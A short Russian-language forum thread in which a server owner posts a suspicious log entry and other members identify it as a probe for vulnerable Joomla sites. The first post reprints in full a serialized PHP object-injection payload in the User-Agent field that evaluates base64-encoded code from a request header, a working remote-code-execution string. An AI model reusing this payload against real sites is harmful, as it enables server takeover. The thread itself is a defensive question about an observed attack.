Пытаются взломать VDS

Discussion in 'Песочница' started by FriLL, 1 Nov 2016.

  1. FriLL

    FriLL Member

    Joined:
    14 Sep 2008
    Messages:
    90
    Likes Received:
    24
    Reputations:
    8
    В логах всплыла такая строчка

    IP: 31.173.226.6

    User Agent:
    gILMC}__BPrXyydvjI|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:71:"eval(base64_decode($_SERVER['HTTP_HGSEK']));JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}󓲑

    NO REFERER
    2016-11-01 16:26:25

    Не пойму это эксплойт какойто или что?

    Сидеть спокойно или заморочиться c защитой?
     
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    830
    Likes Received:
    814
    Reputations:
    90
    это похоже на свежий баг сериализации, которым порнхаб хакнули, ну пыху обнови и не парься

    а может и бекдор где то валяется в коде :D
     
    _________________________
  3. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    830
    Likes Received:
    814
    Reputations:
    90
    _________________________
  4. FriLL

    FriLL Member

    Joined:
    14 Sep 2008
    Messages:
    90
    Likes Received:
    24
    Reputations:
    8
    Ну вроде обновляю переодически

    Да там код как 2 копейки, заметил бы
     
  5. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    830
    Likes Received:
    814
    Reputations:
    90
    да я поспешил с первым ответом, это ищут уязвимые joomla движки
     
    _________________________